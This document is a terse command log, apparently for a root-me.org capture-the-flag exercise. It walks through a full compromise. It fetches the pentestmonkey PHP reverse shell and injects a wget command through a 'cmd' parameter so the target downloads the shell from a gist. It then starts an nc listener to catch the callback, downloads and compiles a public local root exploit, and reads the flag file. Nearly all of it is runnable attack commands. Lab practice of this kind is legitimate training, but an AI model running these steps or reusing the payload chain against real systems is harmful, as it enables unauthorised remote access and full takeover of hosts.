
## on local machine, download pentest monkey reverse shell
# http://pentestmonkey.net/tools/web-shells/php-reverse-shell
wget http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz

## edit for ip and port

## save edited file in gist

## load php web shell from pentest monkey
# https://gist.github.com/anonymous/cb45006d09927cedac5173bcf5eab9eb
http://ctf03.root-me.org/~andy/index.php?page=arbitrary&cmd=wget --no-check-certificate  https://gist.githubusercontent.com/anonymous/cb45006d09927cedac5173bcf5eab9eb/raw/18a4fe191ebf18d108ee6ef96d2549ed902a2c77/monkey.php -O data/monkey.php

## on local machine, downgrade nc
## newer nc won't listen on 6001
yum downgrade http://vault.centos.org/6.6/os/x86_64/Packages/nc-1.84-22.el6.x86_64.rpm

## now listen on port 6001
nc -v -l 6001

## kick off the web app reverse shell
http://ctf05.root-me.org/~andy/data/monkey.php

## download 
cd /tmp
wget http://downloads.securityfocus.com/vulnerabilities/exploits/27704.c -o root.c

## compile
gcc root.c -o rootme
./rootme

## check creds
id

## get flag
cat /passwd









